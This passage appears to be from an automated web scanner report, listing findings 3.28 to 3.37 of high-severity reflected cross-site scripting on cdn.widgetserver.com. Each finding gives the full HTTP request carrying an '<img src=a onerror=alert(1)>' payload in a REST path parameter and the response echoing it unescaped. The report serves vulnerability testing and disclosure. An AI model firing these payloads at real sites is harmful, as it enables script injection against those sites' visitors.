75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink94f39<img src=a onerror=alert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;no
...[SNIP]...

3.28. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/51135bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:31 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/51135bcaa<img src=a onerror=alert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecod
...[SNIP]...

3.29. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/183831369f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:38 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
75","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/183831369f84<img src=a onerror=alert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;li
...[SNIP]...

3.30. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 13]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/07ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:45 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/07ba35<img src=a onerror=alert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link
...[SNIP]...

3.31. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:52 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
latform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img src=a onerror=alert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link="},
...[SNIP]...

3.32. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 15]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img%20src%3da%20onerror%3dalert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:59 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
rm":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img src=a onerror=alert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link="},


...[SNIP]...

3.33. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18572


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
GETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif467b6<img src=a onerror=alert(1)>6c593df3db8":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=8
...[SNIP]...

3.34. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aole8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56534


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aole8572<img src=a onerror=alert(1)>efc59e097e0"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=8250813
...[SNIP]...

3.35. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id1abe0<img%20src%3da%20onerror%3dalert(1)>6a7add9aecc/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","fif":"aol","id1abe0<img src=a onerror=alert(1)>6a7add9aecc":"8f8e2793-e99e-41bf-8b75-95ef3e434575"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/
...[SNIP]...

3.36. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img%20src%3da%20onerror%3dalert(1)>0560571b3eb/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56534


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e4345753ffef<img src=a onerror=alert(1)>0560571b3eb","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0
...[SNIP]...

3.37. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http:33b85<img%20src%3da%20onerror%3dalert(1)>c54be653d5e//at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:16 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
